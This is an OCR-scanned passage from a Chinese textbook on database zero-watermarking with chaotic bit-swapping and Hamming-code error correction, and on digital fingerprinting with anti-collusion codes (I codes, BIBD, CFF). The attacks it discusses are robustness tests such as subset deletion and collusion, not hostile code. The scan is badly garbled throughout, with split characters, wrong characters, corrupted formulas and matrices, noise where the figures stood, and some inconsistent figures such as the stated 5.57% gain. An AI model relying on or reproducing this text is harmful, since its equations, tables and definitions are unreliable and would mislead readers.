图 8-31(a) 是 原始 水 印 ( 版 权 图 像 ); 图 8-31(b) 是 位 交换 后 所 得 的 原始 水 印 , 即 实际 嵌 
人 和 水印。 可 看 到 实际 嵌入 水 印 像素 分 布 比较 均匀 、 无 明显 分 布 规律 ,与 原始 水 印 图 像 不 存在 
明显 关联 ,已 不 能 分 辨 出 原始 水 印信 息 。 

本 算法 使 用 混沌 函数 标记 水 印 嵌 入 位 置 ,因而 水 印 序列 具有 随机 性 ,破解 难度 较 大 。 即 
使 水 印 序列 得 以 破解 ,提取 得 到 的 水 印 也 是 如 图 8-31(b) 所 示 的 实际 嵌入 水 印 ,还 需 位 交换 
才能 恢复 出 如 图 8-31(a) 所 示 的 原始 水 印 ,因此 算法 安全 性 较 好 。 
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由 算法 可 知 ,位 交换 后 水 印 位 置信 息 与 图 像 像素 已 不 存在 一 一 对 应 关系 ,水 印 位 置信 息 
不 会 直接 暴露 给 用 户 , 这 就 使 得 说 入 数据 库 中 的 水 印 位 置 不 易 发 现 , 增 加 了 破解 难度 。 表 现 
为 当 进 行 子 集 删 除 攻击 等 性 能 测试 时 ,提取 的 水 印 会 出 现 如 图 8-31(c) 所 示 随 机 干扰 黑 点 。 
图 8-31(d) 是 全 删除 水 印 后 提取 的 水 印 图 像 ,为 黑白 交错 样式 。 





文本 文本 . 
水 印 水 印 : 3 
(a) 原始 水 印 (b) 实际 虞 入 水 印 (©) 部 分 攻击 后 提取 的 水 印 “(qd) 全 删除 攻击 后 提取 的 水 印 


图 8-31 贬 入 和 提取 的 水 印 


由 于 混沌 函数 的 随机 性 ,使 得 不 同 图 像 、 同 一 图 像 使 用 不 同 参数 时 的 加 密 结果 均 具 有 随 
机 性 ,攻击 者 无 法 实现 已 知 选择 明文 攻击 ,伪造 参数 完全 一 致 的 版 权 图 像 嵌 和 数据库。 因此 
算法 实现 了 对 版 权 图 像 加 密 的 目的 ,提高 了 算法 的 安全 性 。 

版 权 图 像 零 水 印 检测 算法 与 嵌入 算法 类 似 , 故 不 再 详 述 。 检 测 时 为 了 能 够 在 受到 各 种 
攻击 后 有 效 提 高 版 权 图 像 检 测 匹配 率 和 检测 结果 的 可 信和 度 , 引 入 了 校 验 矩阵 对 提取 版 权 图 
像 像 素 矩 阵 进行 纠 错 。 

纠 错 方法 为 顺序 取 每 一 个 虚拟 像素 B(z,y), 其 4 位 值 依 次 记 为 (zs ,ztyzs,ze)， 对 应 
取 校 验 矩阵 的 4 位 作为 (zeyziyzzyzz), 用 一 zs 四 xz 四 rz 四 rz 一 四 z 四 由 mo 一 
zzs 中 zs 中 zs 分 别 计算 异 或 的 结果 ,依次 记 为 (yo ,yi,ys) ,然后 按 表 8-2 对 4 位 像素 位 
(zs ,ZT4ozs ,6) 进 行 纠 错 ,对 3 位 校 验 位 (zo ,zi ,zx;) 则 不 做 任何 处 理 。 

表 8-2 校 验 码 纠 错 方法 

















Jo sys 错误 位 置 处 理 方 法 
110 Zs Zs 取 反 
011 zh zl 取 反 
111 Zs Zs 取 反 
101 x Zs 取 反 








某 次 加 入 校 验 矩 阵 前 后 版 权 图 像 匹 配 率 对 比 实 验 结果 如 表 8-3 所 示 。 
表 8-3 ”加 入 校 验 码 前 后 版 权 图 像 匹 配 率 比较 











a 5% 10% 15% 20% 

p; 96.97% 95.41% 92.48% 86. 62% 
加 入 校 验 码 后 提取 版 文本 立 本 朗 杰 装 
权 图 像 求 印 水 三 ”水 克 

p; 95.31% 90.43% 86. 82% 82.23% 





未 加 入 校 验 码 提取 版 交 本 . 奖 兴 : 安江 Fs 外 
本 人 水 邢 ， 米子 米 印 : 后 
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实验 结果 证 明 ,加 入 校 验 矩 阵 后 提取 的 版 权 图 像 效果 明显 好 于 未 加 校 验 矩 阵 所 提取 的 
版 权 图 像 , 如 更 改 比例 二 25% 时 ,采用 校 验 矩阵 提取 的 版 权 图 像 的 匹配 率 p, 一 78. 20% ,而 
未 采用 校 验 矩阵 提取 的 版 权 图 像 匹配 率 p, 二 73.63% ,图 像 的 匹配 率 提高 了 5.57%。 

多 次 的 实验 结果 表明 : 纠 错 后 可 提高 版 权 图 像 检 测 匹配 率 6% 左 右 , 有 效 增加 了 检测 结 
果 的 可 信和 度 。 


8.4.3 双重 数据 库 零 水 印 模型 


将 具有 直观 性 的 版 权 图像 数 据 库 零 水 印 和 反映 数据 库 数据 特征 但 无 明确 意义 的 传统 数据 
库 零 水 印 通 过 公用 的 一 组 混沌 参数 建立 起 关联 ,构造 了 双重 数据 库 零 水 印 系统 实现 数据 库 版 
权 保护 。 系 统 模型 如 图 8-32 所 示 ,由 零 水 印 嵌 入 /构造 . 零 水 印 注册 、 零 水 印 检测 3 部 分 构成 。 

















































































































































































































































































































一 一 一 广 -一 
混沌 吨 数 让 混沌 函 到 
| 标记 位 置 l 党 标记 位 置 
字符 型 数据 数值 型 数 据 | 站 二 -二 = 二 二 一 ! 
RO 为 二 进 制 | !_| 原始 版 | 四 位 | 虚拟 像素 | ! 
求 Unieode 和 | | 化 为 = 进 制 | | 站 权 图 像 | 一 组 ”| 知 阵 | | 

1 1 

= 1 厂 检 观 为 军 宽 度 
选取 特定 位 ; 玖 外 陈 | www，| 汉 明码 三 庶 拟 像素 | | 不 可 见 字符 息 

| A | | ee ee 人 攻 和 
y i 零 水 印 
rr | | Re 
本 数据 库 发 布 
注册 注册 校 注册 校 注册 
申请 零 水 印 验 撼 阵 申请 
窗 介 1 验 矩阵 3 条 了 | 图 像 窗 钥 2 
计算 零 水 多 数 表决 判断 计算 图 像 | 零 水 印 注册 
印 相似 性 版 权 归属 eR | 《证 中 加) 
获取 获取 
和 : 获取 校 | 获取 校 提交 密 
| 提交 验 矩 阵 | 验 矩 阵 图 和 
各 和民 [往生 了 俐 | | -= 二 一 下 一 -1 [「 符 的 到 
提神 于 入 | 一 | 校 近 全 | ! | 「 谨 拟 像素 | 四 位 | 重 构 版 | ! 上 答 检 禾 据 库 
水 印 | 汉 明码 | 纪 鲁 | ,| | _ 短 阵 “| 一 组 ~| 权 图 像 | ， 

1 1 ! 1 
选取 特定 位 1 校 验 短 阵 | 汉 明码 | 虚拟 像素 | | 提取 零 宽度 
作为 零 水 印 | 纠 错 位 交换 | | 不 可 见 字符 

1 1 
字符 型 数据 数值 型 数据 | L-----------: 解 图 像 预 处 理 _| 
求 Unicode 和 化 为 二 进 制 

Lfamwl_t 堆 水 印 检测 | 
标记 位 轩 - 
| | 











图 8-32 ”双重 数据 库 零 水 印 模型 


算法 : 对 选 定 字符 型 字段 求 Unicode 编码 和 后 转换 为 对 应 的 二 进 制 ,对 选 定 数值 型 字 
段 直接 转换 为 对 应 的 二 进 制 值 ,然后 统一 根据 密 钥 提取 二 进 制 值 的 第 B 位 生成 数据 库 零 水 
印 。 这 样 生成 的 数据 库 零 水 印 具 有 脆弱 性 ,可 充分 体现 数据 库 数据 的 特征 、 实 现 自 改 定位 和 
验证 数据 库 数据 的 完整 性 。 
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为 了 增加 传统 数据 库 零 水 印 的 安全 性 ,对 传统 数据 库 零 水 印 进行 了 二 次 置 乱 ; 为 了 提 
高 传统 数据 库 零 水 印 的 匹配 率 和 可 信 度 ,使 用 汉 明 码 构造 校 验 矩 阵 对 检测 出 的 传统 数据 库 
零 水 印 进行 了 纠 错 。 表 8-4 是 一 次 对 比 实验 结果 ,统计 多 次 实验 结果 可 知 ,使 用 校 验 码 能 够 
提高 传统 数据 库 零 水 印 匹配 率 8% 左 右 。 

为 了 增加 破解 难度 ,我 们 对 初始 水 印 序列 进行 了 二 次 混沌 置 乱 。 方 法 是 使 用 第 二 组 参 
数 Key2 生成 一 组 新 的 随机 序列 Si[ 甘 ,然后 将 初始 水 印 S1[ 站 与 随机 序列 S1[ 让 的 对 应 位 进 
行 位 交换 ,交换 后 得 到 的 序列 作为 最 终 的 传统 数据 库 零 水 印 。 

数据 库 中 非 数值 型 数据 主要 是 指 字符 型 数据 ,其 他 非 数值 型 数据 都 可 转换 为 数字 型 数 
据 处 理 。 因 此 本 算法 具有 普遍 适用 性 ,可 扩大 传统 数据 库 零 水 印 的 适用 范围 ,成 功 解决 了 在 
保证 非 数 值 型 数据 精度 的 前 提 下 ,如何 构 造 数据 库 零 水 印 的 难题 。 

版 权 图 像 零 水 印 算法 在 上 一 节 已 有 介绍 ,这 里 不 再 介绍 。 

在 判断 版 权 归属 时 通过 采用 多 数 表决 来 进一步 提高 检查 结果 的 可 信和 度 , 具 体 做 法 是 : 

(1) 传统 数据 库 零 水 印 匹配 率 ,版 权 图 像 匹 配 率 都 合格 ,确定 版 权 归属 申请 者 。 

(2) 传统 数据 库 零 水 印 匹配 率 ,版 权 图 像 匹 配 率 只 有 一 个 合格 ,版 权 是 否 归属 申请 者 存 
在 争议 , 需 进行 人 工 判 断 或 使 用 其 他 辅助 方法 进一步 确定 版 权 归属 。 

(3) 传统 数据 库 零 水 印 匹配 率 、 版 权 图 像 匹 配 率 都 不 合格 ,确定 版 权 不 归属 申请 者 。 

表 8-4 加 入 校 验 码 前 后 传统 数据 库 零 水 印 匹配 率 比 较 























删除 比例 a 10% 20% 30% 40% 50% 
加 入 校 验 码 100% 98.22% 96. 48% 94.14% 91.31% 
未 加 校 验 码 96. 29% 93.16% 88.09% 85.35% 83.01% 
1. 可 用 性 测试 


(1) 未 受 攻击 : 针对 不 同 的 嵌入 比例 ,使 用 正确 的 参数 进行 试验 ,版 权 图 像 零 水 印 都 可 
正确 检测 出 如 图 8-31(a) 所 示 的 完整 版 权 图 像 ,版 权 图 像 水 印 匹配 率 、 传 统 数据 库 堆 水印 匹 
配 率 均 为 100%。 

(2) 误 判 实验 : 此 处 提出 的 算法 对 参数 具有 敏感 性 ,修改 单一 参数 后 的 实验 结果 如 
表 8-5 所 示 。 可 以 看 出 ,所 有 检测 出 的 版 权 图 像 都 是 由 无 规律 的 像素 构成 的 ,从 中 不 能 观察 
到 任何 有 意义 的 版 权 信息 ,没有 发 生 误 判 现象 。 

表 8-5 误 判 实验 
修改 参数 混沌 初 值 分 形 参 数 长 度 图 像 混沌 参数 | 图 像 分 形 参数 
数值 变化 0. 8321 0. 8786 3. 9489 


AS 站 -J 
2. 性 能 测试 


对 数据 库 的 攻击 以 数据 库 的 可 用 性 为 前 提 , 因 此 以 攻击 50% 的 数据 量 为 上 限 进行 相关 
性 能 测试 , 当 超过 数据 量 超 过 50% 后 ,可 认为 数据 库 已 缺乏 可 用 性 。 
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(1) 子 集 删除 / 子 集 选取 攻击 。 由 表 8-6 中 的 测试 结果 可 以 看 出 : 当 删 除 比例 a 二 50%, 即 
4000 条 数据 库 记录 删除 2000 条 时 ,传统 数据 库 零 水 印 的 匹配 率 p, 二 83.01% ,版 权 图 像 匹 配 率 
二 82.91%, 可 辨别 出 版 权 信息 。 说 明 算法 具有 良好 的 抗 子 集 删除 / 子 集 选 取 攻 击 的 性 能 。 


表 8-6 子 集 删 除 攻击 的 水 印 匹配 率 























a 10% 20% 30% 40% 50% 
p 96. 29% 93.16% 88.09% 85.35% 83.01% 
anutme | 文本 | 文王 | 六 站 | 次 滨 | 放 滨 
水 印 汞 于 | 永 下 | 永 答 :| 玉 感 
人 97.66% 94.43% 91.21% 86.33% 82.91% 





(2) 子 集 更 改 攻 击 。 子 集 更 改 攻击 实验 采用 随机 选取 字段 的 方式 进行 ,实验 结果 如 
表 8-7 所 示 , 可 以 看 到 : 当 更 改 比例 a 二 25% , 即 更 改 4000 个 字段 时 ,传统 数据 库 零 水 印 匹 
配 率 mm 一 84.38% ,版 权 图 像 匹 配 率 p; 一 88. 36%% ,可 辨别 出 版 权 信息 。 说 明 算 法 具有 和 良好 
的 抗 子 集 更 改 攻击 的 性 能 。 


表 8-7 子 集 更 改 攻击 的 水 印 匹 配 率 





a 5% 10% 15% 20% 25% 
no 97.85% 93.16% 91.80% 90.43% 84.38% 





unus 文本 | 文本 | 文本 六 本 | 湛 
we 可 来 开 六 绪 | 基本 


ps 98.14% 97.36% 96. 48% 93.75% 88.36% 




















(3) 子 集 增加 攻击 。 由 于 水 印 位 置 标 记 使 用 ID 进行 ,ID 的 唯一 性 原则 保证 了 记录 增 
加 不 会 改变 原 有 记录 的 ID 号 ,因此 子 集 增加 对 水 印 匹配 率 无 影响 ,始终 保持 为 100% ,但 会 
增加 检测 时 间 。 

版 权 图 像 数 据 库 零 水 印 具有 良好 的 鲁 棒 性 和 直观 性 ,基于 混沌 序列 的 传统 数据 库 零 水 
印 具 有 良好 的 脆弱 性 ,将 两 者 相 结 合 实现 的 基于 双重 数据 库 零 水 印 的 数据 库 版 权 保护 系统 ， 
有 效 提高 了 数据 库 版 权 保护 的 实用 性 ,扩大 了 适用 范围 ,为 进一步 进行 数据 库 版 权 侵 权 追 踪 
研究 葛 定 了 基础 。 

ZWJ 具有 的 零 宽 度 和 不 可 见 双重 特征 ,这 决定 了 其 非常 适合 做 数字 水 印 ,实现 信息 隐藏 。 
如 何在 文本 、 图 像 等 其 他 媒体 中 使 用 ZWJ 作为 数字 水 印 进行 信息 隐藏 ,有 待 于 进一步 探讨 。 


8.5 数字 指纹 


8.5.1 数字 指纹 盗版 追踪 模型 


数字 版 权 保 护 不 仅 要 解决 版 权 归属 问题 ,而 且 要 通过 法 律 取证 对 不 诚实 购买 者 (叛逆 
者 ) 提 出 法 律 指控 ,解决 叛逆 者 追踪 问题 ,从 而 对 数字 资源 非法 复制 和 非法 传播 进行 法 律 制 
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裁 , 实 现 数字 版 权 全 程 保护 。 

前 者 使 用 数字 水 印 技术 实现 ,后 者 使 用 数字 指纹 技术 实现 。 数 字 水 印 技术 在 数字 资 
源 中 嵌入 标识 数字 资源 所 有 者 的 数字 水 印 , 同 一 个 所 有 者 的 数字 资源 中 嵌入 的 数字 水 印 
相同 ,用 户 手 中 的 数字 资源 中 只 嵌 有 版 权 所 有 者 的 数字 水 印 , 只 能 据 此 解决 数字 资源 版 
权 归 属 问题 ,不 能 区 分 购买 者 ; 数字 指纹 技术 在 每 一 个 购买 数字 资源 中 嵌入 标 识 其 购买 者 
的 唯一 数字 指纹 ,用 户 手 中 的 数字 资源 中 都 嵌 有 自己 的 数字 指纹 ,无 法 抵赖 。 当 发 现 资 版 
时 ,提取 艇 入 数字 资源 的 数字 指纹 就 能 够 准确 发 现 不 诚实 的 购买 者 ,实现 数字 资源 盗版 
追踪 。 

数字 指纹 技术 在 分 发 的 每 份 副本 中 秘密 嵌入 一 个 唯一 序列 码 (数字 指纹 ) 来 实现 版 权 保 
护 与 叛 道 者 追踪 ,通过 提取 嵌入 非法 副本 的 指纹 序列 与 指纹 数据 库 中 的 指纹 序列 比 对 跟踪 
原始 购买 者 .发现 叛逆 者 。 

数字 指纹 技术 采用 指纹 编码 作为 分 发 给 用 户 的 身份 认证 信息 ,指纹 编码 应 当 具 有 唯一 
性 , 即 每 一 个 指纹 编码 唯一 对 应 一 个 用 户 ,与 此 同时 指纹 编码 还 应 当 具 有 抗 多 种 合谋 攻击 的 
特性 。 为 避免 未 经 授权 的 副本 制作 和 发 行 ,出 品 人 可 以 将 不 同 用 户 的 ID 或 序列 号 作为 不 同 
的 数字 指纹 嵌入 作品 的 合法 副本 中 。 一 旦 发 现 未 经 授权 的 副本 ,就 可 以 根据 此 副本 所 恢复 
出 的 指纹 来 确定 它 的 来 源 。 

数字 指纹 技术 是 一 种 在 开放 网 络 环境 下 保护 数字 版 权 、 认 证 数字 资源 来 源 及 完整 性 的 
技术 ,有 助 于 多 媒体 信息 版 权 保 护 及 其 版 权 冲 突 问题 的 解决 。 

数字 指纹 技术 由 数字 水 印 技术 发 展 而 来 ,主要 解决 版 权 追 踪 问 题 。 工 作 原理 是 数字 资 
源 版 权 所 有 者 在 其 出 售 的 数字 资源 副本 中 授与 购买 者 身份 相关 的 唯一 性 信息 (指纹 ) , 当 
发 现 非法 副本 后 ,所 有 者 通过 检测 租 和 的 指纹 识别 非法 副本 的 原始 购买 者 (叛逆 者 ) ,进而 通 
过 法 律 诉讼 叛逆 者 ,从 而 实现 保护 版 权 所 有 者 权益 、 对 非法 分 发 行为 进行 威慑 的 目的 。 

数字 指纹 应 具有 良好 的 鲁 棒 性 ,能 够 很 好 地 抵御 非法 攻击 ; 应 具有 唯一 性 ,与 用 户 之 间 
存在 一 一 对 应 关系 。 数 字 指 纹 的 唯一 标识 性 保障 了 区 分 性 ,使 得 视频 盗版 追踪 变 得 可 行 ; 
数字 指纹 的 匹配 要 满足 高 效 性 和 精确 性 两 个 准则 。 

叛逆 者 追踪 的 成 功 案例 是 1981 年 ,英国 内 阁 秘 密 文 件 的 图 像 被 翻印 在 报纸 上 登 出 。 传 
闻 事 先 玛 格 丽 特 。 撒 切 尔 夫 人 给 每 位 部 长 分 发 了 可 唯一 鉴别 的 文件 副本 。 每 份 副本 有 着 不 
同 字 间 距 , 用 于 确定 收 件 人 的 身份 信息 ,用 这 种 方法 查 出 了 泄密 者 。 

基于 数字 指纹 的 数字 资源 版 权 保 护 已 有 的 一 些 应 用 。2007 年 ,谷歌 旗下 的 YouTube 
视频 网 站 公司 ,利用 数字 指纹 技术 分 析 片 段 的 音频 或 视频 轨道 ,发 出 警报 通知 网 站 发 现 媒体 
公司 注册 过 所 有 权 的 视频 ,删除 未 经 版 权 所 有 者 许可 而 发 布 的 相关 视频 ,从 而 达到 保护 版 权 
的 目的 ; Audible Magic 公司 的 视频 检索 系统 首先 对 媒体 公司 提供 的 音乐 .电视 节目 和 电影 
副本 进行 分 析 、 提 取 指纹 ,然后 添加 至 中 央 数 据 库 中 。 视 频 共 享 网 站 利用 该 系统 提取 用 户 上 
传 的 指纹 ,然后 与 数据 库 中 的 指纹 进行 对 比 判断 是 否 是 盗版 数字 资源 ; 国内 优酷 视频 网 站 
也 使 用 数字 指纹 技 检测 并 删除 一 些 用 户 上 传 的 违规 或 侵权 的 非法 视频 。 

数字 指纹 技术 研究 重点 是 指纹 编码 和 检测 技术 ,目的 是 提高 数字 指纹 抗 共 谋 攻 击 能 力 。 
数字 指纹 技术 将 指纹 信息 嵌入 到 数字 资源 内 作为 版 权 保护 的 标识 ,建立 了 数字 指纹 与 用 户 
唯一 对 应 的 特性 ,通过 数字 指纹 的 比 对 检索 实现 盗版 追踪 ,是 解决 数字 资源 版 权 保护 问题 的 
一 种 有 效 和 最 具 潜 力 的 技术 。 
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如 图 8-33 所 示 ,数字 指纹 盗版 追踪 模型 由 指纹 嵌入 (Embedded Fingerprinting)、 多 用 
合谋 攻击 (Multiuser Attacks) 叛逆 者 追踪 (CTraitor Tracing)3 部 分 构成 。 
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图 8-33 ”数字 指纹 盗版 追踪 模型 


指纹 嵌入 阶段 : 系统 为 用 户 Alice 分 配 数字 指纹 (Digital Fingerprint) ,将 数字 指纹 垦 入 
Alice 购买 的 数字 资源 生成 含 数字 指纹 数字 资源 分 发 给 Alice。 

多 用 户 合谋 阶段 : Alice、Bob 等 多 个 用 户 进 行 合 谋 攻 击 (Collusion Attack) ,通过 比 对 
各 自 含 数字 指纹 版 本 数字 资源 发 现 数字 指纹 嵌 和 位置, 进行 移 除 指纹 .指纹 自 改 等 操作 破坏 
嵌入 的 数字 指纹 ,生成 合谋 版 本 数字 资源 进行 非法 二 次 分 发 (Unauthorized Redistribution) 
获 利 。 此 时 ,Alice、Bob 等 的 身份 由 合法 用 户 转变 为 叛 道 者 (Traitor) 。 

盗版 追踪 阶段 : 发 现 网 络 中 存在 可 疑 版 本 数字 资源 ,系统 从 中 提取 数字 指纹 (Extract 
Fingerprints) ,通过 与 原始 数字 指纹 库 比 对 识别 叛逆 者 (Identity Traitor) ,实现 叛逆 者 追 
踪 ,为 依法 打击 盗版 行为 提供 法 律 依据 。 

数字 指纹 根据 岩 入 提取 方式 可 以 分 为 对 称 数字 指纹 和 非 对 称 数字 指纹 两 类 。 对 称 数 字 
指纹 嵌入 提取 方 和 用 户 双 方 都 知道 嵌入 的 数字 指纹 ,发 现 非法 数字 档案 时 难以 确定 叛 道 者 
存在 嵌入 提取 方 诬陷 用 户 的 可 能 性 ; 非 对 称 数 字 指 纹 需 要 授 入 提取 方 和 用 户 双 方 共同 参与 
指纹 做 和 人 提取 过 程 , 双 方 不 能 相互 抵赖 ,能 够 提供 无 争议 的 法 律 凭证 ,准确 追踪 、 定 位 叛 
逆 者 。 


8.5.2 抗 合 谋 数字 指纹 编码 


数字 指纹 技术 采用 指纹 编码 作为 分 发 给 用 户 的 身份 认证 信息 ,指纹 编码 应 当 具 有 唯一 
性 , 即 每 一 个 指纹 编码 唯一 对 应 一 个 用 户 ; 与 此 同时 ,指纹 编码 还 应 当 具 有 抗击 合谋 攻击 的 
特性 。 

定义 1: 令 G 是 二 进 制 运算 。 的 半 群 ,C={c , …, c*} 是 G。 上 的 码 字 集 , 如 果 对 于 所 有 
的 1<&i Sr SjSr, i C 中 任意 选取 i 个 码 字 向 量 做 ， 运 算 的 结果 与 任意 选取 j 个 码 字 
向 量 做 运算 的 结果 不 相同 . 则 称 C 为 G,。 上 +r-(G,,，* )ACC。 
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当 G={0,1} 并 且 ， 为 逻辑 与 运算 时 , r(G,,。 ) 称 作 抗 与 合谋 编码 ,简称 -AND- 
ACC。 含义 为 任意 不 超过 个 指纹 码 字 按 位 逻辑 与 的 结果 是 唯一 的 。 

类 似 可 定义 抗 或 合谋 编码 、 抗 平均 合谋 编码 等 。 

数字 指纹 由 Wagner N. R. 在 1983 年 提出 。 用 户 合 谋 攻击 问题 的 主要 思想 是 比较 各 合 
法 用 户 复制 的 不 同 之 处 发 现 指纹 嵌入 位 置 并 做 出 修改 ,从 而 达到 去 除 指纹 信息 或 诬陷 他 人 
的 目的 。Boneh D. 等 基于 嵌入 假设 提出 一 种 抗 合 谋 编 码 (Antircollusion Codes,ACC) 一 一 
C 安全 码 , 编 码 在 不 超过 rr(r 三 3) 个 用 户 合谋 时 ,能 以 一 个 较 大 概率 追踪 到 至 少 一 名 合 
谋 者 。 

ACC 设计 时 应 综合 考虑 码 字 长 度 、 用 户 数 人 最 大 抗 合 谋 人 数 ~ 等 多 项 因素 。t 个 用 


户 中 个 用 户 合谋 ,合谋 集 大 小 S 一 C: 十 … 十 CI 一 2 'S 值 随 t、r 值 的 增 大 而 增 大 。 在 


指纹 编码 检测 中 ,需要 将 合谋 指纹 码 字 和 合 谋 集 的 特征 码 字 进 行 比 对 ， S 值 增 大 将 导致 编码 
检测 时 间 开 销 和 存储 空间 开销 增加 。 因 此 如 何 减少 ACC 码 字 长 度 ,提高 编码 效率 是 ACC 
设计 追求 的 目标 。 

常见 的 ACC 有 I 码 、 均 衡 不 完全 区 组 设计 (Balanced Incomplete Block Design,BIBD) 
码 .CFF(Cover Free Family, 自 由 覆盖 族 ) 码 等 。1 码 构造 简单 ,n 旦 O(z) 线 性 增长 ,编码 效 
率 7 二 1, 不 适合 大 量 用 户 的 场合 。 基 于 组 合理 论 的 BIBD 码 和 CFF 码 码 距 大 、 抗 干扰 能 力 
强 ,n 星 OGmy) (Gm 为 常数 ) 线 性 增长 ,编码 效率 w=t/n(t 二 n) ,能 有效 缩短 码 字 长 度 、 提 高 
编码 效率 。 例 如 , 当 一 2 一 247 时 ,I 码 的 n= 二 247、y 二 1,BIBD 码 的 n= 二 39、7 二 6.3,CFF 码 
的 n= 25、7 一 8.88。 

但 BIBD 码 和 CFF 码 都 存在 构建 大 参数 编码 困难 的 问题 ,BIBD 对 参数 的 限制 比 CFF 
更 严 , 构造 难度 大 于 CFF ,表现 为 特定 参数 下 BIBD 设计 不 存在 , 需 同时 满足 多 个 区 组 设 
计 参 数 。 因 此 2009 年 LiQL 等 人 提出 放宽 区 组 设计 参数 限定 ,以 BIBD 的 超 集 CFF 为 基 
础 构建 抗 合谋 编码 CFF 码 ,主要 应 用 于 组 密 钥 分 发 .分 组 测试 .数据 通信 等 各 个 领域 。 

1. 工 码 一 一 抗 合 谋 原理 

如 图 8-34 所 示 ,2 个 用 户 的 工 码 码 字 抢 阵 C 由 标准 允 X7 正 交 和 矩阵 (单位 矩阵 ) 求 补 得 
到 。 用 户 U; 的 码 字 在 第 ; 个 位 置 上 为 0, 其 他 位 置 上 全 为 1。 因 为 每 个 码 字 只 有 一 个 对 应 
位 置 的 值 为 0, 所 以 任意 (2 二 7 个 用 户 之 间 与 合谋 产生 的 码 字 结果 是 惟一 的 ,根据 合 
谋 码 字 中 0 的 位 置 就 能 唯一 识别 参与 合谋 的 所 有 用 户 。 例 如 C 中 1、3 用 户 与 合谋 码 字 为 
(01011)。I 码 的 码 长 与 用 户 数 成 正比 o(n) ,因此 不 适合 大 量 用 户 使 用 。 

I 码 能 抵抗 与 合谋 ,但 本 身 不 能 抵抗 或 合谋 。 因 为 C 中 任意 7 个 用 户 或 合谋 的 码 字 都 
是 (11111), 从 中 无 法 准确 地 追踪 出 一 个 用 户 。 

为 使 1 码 能 同时 抵抗 与 合谋 和 或 合谋 , 需 对 C 下 三 角 全 1 矩阵 取 反 为 全 0 和 矩阵 ,如 图 8-34 
中 的 矩阵 C 十 所 示 。 此 时 根据 合谋 码 字 中 0 的 位 置 能 唯一 识别 出 ~ 个 或 合谋 者 之 一 ,满足 叛 
道 者 追踪 的 基本 要 求 。 例 如 从 或 合谋 码 字 (00111) 中 可 知 用 户 2 一 定 是 叛 道 者 。 但 此 时 与 
合谋 也 仅 能 追踪 出 ~ 个 合谋 者 之 一 ,而 非 全 部 合谋 者 。 例 如 用 户 1、 用 户 3 此 时 与 合谋 码 字 
为 (00011) ,说 明 用 户 3 一定 是 叛逆 者 ,但 无 法 确定 男 一 叛逆 者 ,因为 用 户 2、 用 户 3 此 时 与 
合谋 码 字 也 为 (00011) 。 
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vo 1 01111 
下 00111 
C=|1 i1011| Cloo0oo0olili 
二 00001 
I 让 00000 


图 8-34 工 码 码 字 和 矩阵 


2. CFF 码 

定义 2: 设 zz 是 一 个 元 素 集合 ,f 是 由 xz 中 元 素 构成 的 子 集 ( 称 作 块 或 区 组 ) 的 集合 , 两 
个 集合 中 的 元 素数 目 分 别 为 |z|==n 和 |f|==t,D== (x, 了 f) 表 示 一 个 组 合 设 计 。 如 果 对 于 任 
意 属于 了 中 的 r 块 A1,…,A, 组 成 的 集合 A 以 及 属于 了 的 任意 其 他 一 块 Bu ,Bu。 都 不 真 包含 
于 A, 则 称 D 为 一 个 参数 为 r 的 自由 覆盖 族 ,简称 为 -CFF(n,1)。 

由 定义 2 可 知 , CFF 只 要 求 满足 任何 一 块 不 属于 另外 其 他 块 组 成 的 子 块 集合 这 唯一 条 
件 , 而 BIBD 还 有 其 他 限制 条 件 ,因此 CFF 比 BIBD 构造 简单 。 

定义 3: 令 D=(z 思 是 一 个 六 CFF(z,D,M 是 它 对 应 的 关联 和 卸 阵 。 将 关联 矩阵 M 按 
位 取 补 后 得 到 的 新 矩阵 就 是 码 字 矩阵 C。C 构成 一 个 能 够 抗 > 用 户 的 AND-ACC CFF 编码 
集 , 其 中 每 一 行 对 应 一 个 编码 码 字 。 

证 明 : 令 J、K 是 分 别 属于 {1,…,r} 的 子 集 , 171=j,|K|=k(1<j,k<7),JN 人 NK=8。 
要 证 明 -CFF 是 AND-ACC, 即 要 证 明 不 大 于 vr 的 任意 子 集 k 按 位 逻辑 与 组 合 后 构成 的 新 
码 字 和 不 大 于 vr 的 任意 其 他 子 集 按 位 逻辑 与 组 合 构 成 的 新 码 字 之 间 是 不 相同 的 , 即 要 证 
NjeyAs 和 miekA4Af 两 者 之 间 是 不 相同 的 , 按照 德 摩根 定理 ,这 等 价 于 证 UierAF 和 
UkekA8 两 者 之 间 是 不 相同 的 。 

假设 Uje/A5= UierA5, 对 于 任意 的 jEJ, 有 Aj E€ UierA5 成 立 。 而 这 一 结论 与 玉 
CFF 定义 矛盾 ,因此 假设 不 成 立 , 所 以 有 ,UjejA5 关 UierAF 证 毕 。 

根据 以 上 定义 ,AND-ACC CFF 编码 构造 过 程 为 : 

(1) 根据 定义 1 构造 组 合 设计 D= (xz, 为 -CFF(n,t)。 如 集合 z={1,2,3,4,5,6,7， 
8,9,10,11,12} 可 构造 一 个 2-CFF(12,16), 所 有 区 组 构成 的 集合 f= {1,…,fi)}。 有 i= 
{1,2,3},f2={2,4,9},fs={3,4,10}, f={4,5,6},f6={1,4,7),f6={2,5,7},f;={3,5, 
a f= 6 
8},fu={2,8,11}; fi ={3,7,11}, fi={10,11,12}。 

集合 f 满足 CFF 定义 ,但 不 满足 BIBD 要 求 的 了 中 任意 一 个 元 素 出 现 次 数 相同 这 一 条 
件 ,f 中 12 出现 了 2 次 ,11 出 现 了 3 次 ,…… :所 以 f 不 是 一 个 BIBD。 

(2) 根据 -CFF(n,z) 构 造 对 应 关联 矩 阵 。 方 法 为 每 行 对 应 一 个 CFF 区 组 fi ,每 列 对 应 

合 工 的 一 个 元 素 ,f; 中 包含 元 素 对 应 位 置 记 1, 其 余 位 置 记 0。 如 有 对 应 置 1 位 置 为 1、 
2、3, 其 对 应 编码 为 111000000000。 如 图 8-35 中 M 第 一 行 所 示 。 

(3) 根据 定义 3 构造 码 字 矩阵 C, 生 成 对 应 编码 。 构 建 的 2-AND-ACC CFF(12,16) 的 C 
如 图 8-36 所 示 ,容易 验证 C 中 任意 两 个 码 字 之 间 做 逻辑 与 .逻辑 或 的 结果 是 唯一 的 ,能 有 效 
抵抗 任意 两 个 用 户 之 间 的 与 合谋 攻击 ,或 合谋 攻击 。 
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1 11000000000 0 
010100001000 101011110111 
001100000 100 0 0 FlrL LA 0 rt 
000111000000 1 
100100100000 (2 ,| 
0 1 0 0 10 1 0 0 0 0 0 1 有 7 
0010 100 10000 1 10101101111 

ml 00100010001 cll i1011101110 
10 0 0 1 0 0 0 1 0 0 0 和 
010001000 100 101110111011 
00100 1001000 1 10110110111 
